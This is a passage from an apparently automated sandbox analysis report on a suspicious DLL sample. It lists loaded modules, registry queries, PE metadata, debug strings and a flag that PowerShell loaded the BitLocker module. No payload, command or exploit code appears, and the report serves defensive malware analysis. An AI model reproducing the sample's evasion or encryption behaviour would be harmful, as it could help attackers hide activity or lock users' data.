    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\OfficeJump to behavior
    Source: 0j6nSbUQQS.dllStatic file information: File size 1073664 > 1048576
    Source: 0j6nSbUQQS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: 0j6nSbUQQS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: 0j6nSbUQQS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: 0j6nSbUQQS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: 0j6nSbUQQS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: 0j6nSbUQQS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: 0j6nSbUQQS.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
    Source: 0j6nSbUQQS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: e.pdb source: powershell.exe, 00000012.00000002.1993610573.000002377BB2B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: embly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000009.00000002.1903288280.00000196A60C4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: softy.pdbatt source: powershell.exe, 00000009.00000002.1890847060.00000196A5E87000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000012.00000002.1995221099.000002377BB7E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.1903698906.00000196A60FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1900494001.00000196A6056000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 000114})peration: (:) [New-Object], MethodInvocationException.pdb source: powershell.exe, 00000009.00000002.1790967706.000001968EF02000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb1(0&0 source: powershell.exe, 00000009.00000002.1900494001.00000196A6056000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbgeName source: powershell.exe, 00000009.00000002.1901080477.00000196A6090000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1899993710.00000196A6050000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1890847060.00000196A5E87000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ion.pdb source: powershell.exe, 00000012.00000002.1993610573.000002377BB0A000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 6?t.Automation.pdb source: powershell.exe, 00000009.00000002.1901080477.00000196A6090000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbat source: powershell.exe, 00000009.00000002.1890847060.00000196A5E87000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32z source: powershell.exe, 00000012.00000002.1993610573.000002377BB2B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbment.Automation.pdb source: powershell.exe, 00000012.00000002.1993610573.000002377BB2B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: b.pdb source: powershell.exe, 00000009.00000002.1901080477.00000196A6090000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb5 source: powershell.exe, 00000009.00000002.1900494001.00000196A6056000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ion.pdb% source: powershell.exe, 00000012.00000002.1993610573.000002377BB0A000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: re.pdb source: powershell.exe, 00000012.00000002.1979319690.0000023779949000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Target.pdbShell\vg' source: powershell.exe, 00000012.00000002.1995221099.000002377BB7E000.00000004.00000020.00020000.00000000.sdmp
    Source: 0j6nSbUQQS.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: 0j6nSbUQQS.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: 0j6nSbUQQS.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: 0j6nSbUQQS.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: 0j6nSbUQQS.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B7E00AD pushad ; iretd 9_2_00007FFD9B7E00C1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B8BC2E4 pushfd ; retn 0000h9_2_00007FFD9B8BC2E5
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B8BC2AD pushfd ; retn 0000h9_2_00007FFD9B8BC2E1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B8BB9DE push ss; ret 9_2_00007FFD9B8BB9DF

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
